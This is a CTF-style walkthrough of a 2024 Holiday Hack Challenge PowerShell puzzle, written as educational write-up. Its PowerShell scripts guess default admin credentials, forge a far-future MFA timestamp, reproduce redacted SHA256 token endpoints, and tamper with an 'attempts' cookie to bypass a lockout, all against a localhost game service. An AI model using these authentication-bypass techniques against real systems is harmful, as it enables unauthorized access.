If you want to play the challenge yourself, you can find it here:

https://2024.holidayhackchallenge.com/

Story line

Let’s start off by talking to the elf:

Hey there, friend! Piney Sappington here.

You’ve probably heard the latest—things are getting tense around here with all the faction business between Wombley and Alabaster. But, let’s focus on this PowerShell Terminal for now.

This is the remote access for our snowball weaponry. We programmed some defense mechanisms to deter intruders, but the system is in a faulty lockdown state.

I certainly wasn’t the one that programmed the mechanism. Nope not me. But can you help me find a way through it so I can regain access?

There’s two functions I need access to. The snow cannon terminal, which should be easier. And the snow cannon production and deployment plans. That one’s better defended.

Still, I’ve got faith in you. We need every advantage we can get right now, and you might be just the one to tip the balance.

So, think you can do it? Are you ready to show what you’ve got?

Hints

There are no hints available.

Recon

Upon opening the challenge, we’re greeted with a terminal. It looks a lot like the Curling challenge from before, but this time we’ll have to use some PowerShell to solve the challenge.

Welcome screen
Welcome screen

Let’s enter “y”, press enter, and start the challenge.

Silver

Task 1

Question 1
Question 1

We’re starting off easy. To get the contents of a file we can use the Get-Content cmdlet.

Get-Content welcome.txt

Task 2

Question 2
Question 2

Now we’ll have to count the words in the file. We can do this by combining the previous command with the Measure-Object cmdlet.

Get-Content welcome.txt | Measure-Object -Word

Task 3

Question 3
Question 3

For the third task, we have to find a server on the local machine, we can use netstat for that.

netstat -a

Task 4

Question 4
Question 4

Now that we’ve found the server, we have to send a request to it. The Invoke-WebRequest cmdlet is made for that.

Invoke-WebRequest "http://localhost:1225"

Task 5

Question 5
Question 5

Next up is sending HTTP Basic authentication credentials. In PowerShell, we can use the Get-Credential cmdlet to configure the credentials. Afterwards, we can send them along with out request.

The credentials are not given here, but we can use come common combinations like “admin” as the username and “password” as the password. After trying a few, we’ll find that using “admin” for both works.

$cred = Get-Credential  # enter admin:admin
Invoke-WebRequest "http://localhost:1225" -Credential $cred -AllowUnencryptedAuthentication

Task 6

Question 6
Question 6

The credentials worked, and we got a response. The response contains quite a few links, so we’ll create a loop to go over them, and find the one we need.

The result from Invoke-WebRequest has the Links attribute, which contains a list of all the links on the webpage. We can loop over those, send a request for each of them, and use the Measure-Object cmdlet again to count the words.

$res = Invoke-WebRequest "http://localhost:1225" -Credential $cred -AllowUnencryptedAuthentication
foreach ($link in $res.Links){
    $endpoint_res = Invoke-WebRequest $link.href -Credential $cred -AllowUnencryptedAuthentication
    $count = $endpoint_res.Content | Measure-Object -Word

    if ($count.Words -eq 138) {
        $endpoint_res.Content
    }
}

Task 7

Question 7
Question 7

We found the one, and it contains a reference to a CSV file. Let’s use Invoke-WebRequest again to get the file.

Invoke-WebRequest "http://127.0.0.1:1225/token_overview.csv" -Credential $cred -AllowUnencryptedAuthentication
Shortened content
Shortened content

After getting the file, the tasks isn’t completed yet. By default, only a small part of the content is shown, and the rest is cut off. We can save the response to a variable, and use .Content to get the full output.

$csv = Invoke-WebRequest "http://127.0.0.1:1225/token_overview.csv" -Credential $cred -AllowUnencryptedAuthentication
$csv.Content

Task 8

Question 8
Question 8

Now we just need to send a simple request again. We can find how it should look like by looking at one of the comments at the end of the CSV file. We also know which column contains the sha256sum by looking at the previous response (the header was in there).

Invoke-WebRequest "http://127.0.0.1:1225/tokens/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C" -Credential $cred -AllowUnencryptedAuthentication

Task 9

Question 9
Question 9

For task 9, we’ll have to send a cookie along with the request. We can do this by using the -Headers parameter to manually set the cookie header. For the value we can use the file’s MD5 hash from the CSV.

$res = Invoke-WebRequest "http://127.0.0.1:1225/tokens/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C" -Credential $cred -AllowUnencryptedAuthentication -Headers @{Cookie="token=5f8dd236f862f4507835b0e418907ffc"}
$res.Content

Task 10

Question 10
Question 10

Next, we’ll have to send another request with another cookie to a different endpoint.

Invoke-WebRequest "http://127.0.0.1:1225/mfa_validate/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C" -Credential $cred -AllowUnencryptedAuthentication -Headers @{Cookie="token=5f8dd236f862f4507835b0e418907ffc; mfa_token=1735818892.786766"}
MFA token expired
MFA token expired

I took a break in between solving task 9 and 10, so by the time I sent the request the token had already expired. We can solve this issue using two different methods.

The first method is to just request a new token. We can grab the token from the response automatically using the Links attribute again, and sent it along.

$token = Invoke-WebRequest "http://127.0.0.1:1225/tokens/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C" -Credential $cred -AllowUnencryptedAuthentication -Headers @{Cookie="token=5f8dd236f862f4507835b0e418907ffc"}
$mfa_token = $token.Links[0].href
$res = Invoke-WebRequest "http://127.0.0.1:1225/mfa_validate/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C" -Credential $cred -AllowUnencryptedAuthentication -Headers @{Cookie="token=5f8dd236f862f4507835b0e418907ffc; mfa_token=$mfa_token"}
$res.Content

From taking a good look at the mfa token values though, it looks like it could be a unix time stamp; every time you request one the value increases slightly depending on time, and from experience I can see the value seems right for the current time.

Let’s try just sending a timestamp very far ahead in the future.

$res = Invoke-WebRequest "http://127.0.0.1:1225/mfa_validate/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C" -Credential $cred -AllowUnencryptedAuthentication -Headers @{Cookie="token=5f8dd236f862f4507835b0e418907ffc; mfa_token=2735818892.786766"}
$res.Content

Task 11

Question 11
Question 11

Yay, that worked! Now for out final task, we’ll have to base64 decode a string. This is not implemented in PowerShell itself, but luckily we can use some methods from the System namespace from .NET.

[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("Q29ycmVjdCBUb2tlbiBzdXBwbGllZCwgeW91IGFyZSBncmFudGVkIGFjY2VzcyB0byB0aGUgc25vdyBjYW5ub24gdGVybWluYWwuIEhlcmUgaXMgeW91ciBwZXJzb25hbCBwYXNzd29yZCBmb3IgYWNjZXNzOiBTbm93TGVvcGFyZDJSZWFkeUZvckFjdGlvbg=="))
End of silver
End of silver

Gold

Continued story line

Let’s first talk to the elf again, he’ll tell us what we’ll have to do for gold.

Fantastic work! You’ve navigated PowerShell’s tricky waters and retrieved the codeword—just what we need in these uncertain times. You’re proving yourself a real asset!

I’ll let you in on a little secret—there’s a way to bypass the usual path and write your own PowerShell script to complete the challenge. Think you’re up for it? I know you are!

Well done! you’ve demonstrated solid PowerShell skills and completed the challenge, giving us a bit of an edge. Your persistence and mastery are exactly what we need—keep up the great work!

New hints

We also got some new hints from the elf.

I overheard some of the other elves talking. Even though the endpoints have been redacted, they are still operational. This means that you can probably elevate your access by communicating with them. I suggest working out the hashing scheme to reproduce the redacted endpoints. Luckily one of them is still active and can be tested against. Try hashing the token with SHA256 and see if you can reliably reproduce the endpoint. This might help, pipe the tokens to Get-FileHash -Algorithm SHA256.
They also mentioned this lazy elf who programmed the security settings in the weapons terminal. He created a fakeout protocol that he dubbed Elf Detection and Response “EDR”. The whole system is literally that you set a threshold and after that many attempts, the response is passed through… I can’t believe it. He supposedly implemented it wrong so the threshold cookie is highly likely shared between endpoints!

Solving

From reading the hints, it seems like we need to generate a hash for a redacted token. Luckily, one of them isn’t redacted, and so we have an example of what the outcome should be. The hint also refers to SHA256, which looks right since that is also what we saw in the CSV header.

Before implementing this, it’s good to first experiment on what we need. We can use CyberChef to test the hash hypothesis. If we create a recipe for a simple SHA256 hash of the input, we’ll quickly find out that the output is not what we expect.

When playing around with the input value, we’ll find that if we add a newline character to the input and run the recipe, it does return the expected output. This is not totally unexpected, as files often have an empty line at the end. This may have also been the case when the current hashes we generated.

In PowerShell, we can generate hashes using Get-FileHash. This only supports files or streams as an input though, so we’ll need to create either of those for it to work. Creating a stream from a string is fairly straightforward, so let’s take that route.

$token = "5f8dd236f862f4507835b0e418907ffc`n"
$tokenAsStream = [System.IO.MemoryStream]::new()
$writer = [System.IO.StreamWriter]::new($tokenAsStream)
$writer.write($token)
$writer.Flush()
$tokenAsStream.Position = 0
(Get-FileHash -Algorithm SHA256 -InputStream $tokenAsStream).Hash
4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C

Perfect, it works exactly as we need it to. We can now also try it with a different token, and send the request.

$rawToken = "67c7aef0d5d3e97ad2488babd2f4c749"
$token = "$rawToken`n"
$tokenAsStream = [System.IO.MemoryStream]::new()
$writer = [System.IO.StreamWriter]::new($tokenAsStream)
$writer.write($token)
$writer.Flush()
$tokenAsStream.Position = 0
$hash = (Get-FileHash -Algorithm SHA256 -InputStream $tokenAsStream).Hash
$hash

Invoke-WebRequest "http://127.0.0.1:1225/mfa_validate/$hash" -Credential $cred -AllowUnencryptedAuthentication -Headers @{Cookie="token=$rawToken; mfa_token=2735818892.786766"}

Great, the server accepted the request. We got a response about a cookie being set.

Setting cookie result
Setting cookie result

The cookie attempts is being set to c25ha2VvaWwK01. Let’s add that to our request.

Invoke-WebRequest "http://127.0.0.1:1225/mfa_validate/$hash" -Credential $cred -AllowUnencryptedAuthentication -Headers @{Cookie="token=$rawToken; mfa_token=2735818892.786766; attempts=c25ha2VvaWwK10"}
<h1>[-] ERROR: Access Denied</h1><br> [!] Logging access attempts

Now we got a different response, but a cookie is still being set. This time attempts is being set to c25ha2VvaWwK02. We can keep repeating this process, and eventually the cookie will stay at c25ha2VvaWwK10.

We still don’t get any medal or a different message though. Perhaps the token we’ve chosen is not the right one, and we need a specific other one. To test this, we can create a loop that will go over all the tokens in the CSV file, making sure to skip the first line (the csv header), and the last eight line (comments).

$cred = Get-Credential  # admin:admin
$csv = Invoke-WebRequest "http://127.0.0.1:1225/token_overview.csv" -Credential $cred -AllowUnencryptedAuthentication
foreach ($line in $($csv.Content -split "`n" | Select-Object -Skip 1 | Select-Object -SkipLast 8)){
    $rawToken = $line -split "," | Select-Object -First 1  # remove ,REDACTED from the line
    $token = "$rawToken`n"
    $tokenAsStream = [System.IO.MemoryStream]::new()
    $writer = [System.IO.StreamWriter]::new($tokenAsStream)
    $writer.write($token)
    $writer.Flush()
    $tokenAsStream.Position = 0
    $hash = (Get-FileHash -Algorithm SHA256 -InputStream $tokenAsStream).Hash

    $mfa = Invoke-WebRequest "http://127.0.0.1:1225/mfa_validate/$hash" -Credential $cred -AllowUnencryptedAuthentication -Headers @{Cookie="token=$rawToken; mfa_token=2735818892.786766; attempts=c25ha2VvaWwK10"}
    $mfa.RawContent
}

If we now run this and wait a second or two, we’ll get the gold medal!

Final elf message

Incredible! You tackled the hard path and showed off some serious PowerShell expertise. This kind of skill is exactly what we need, especially with things heating up between the factions.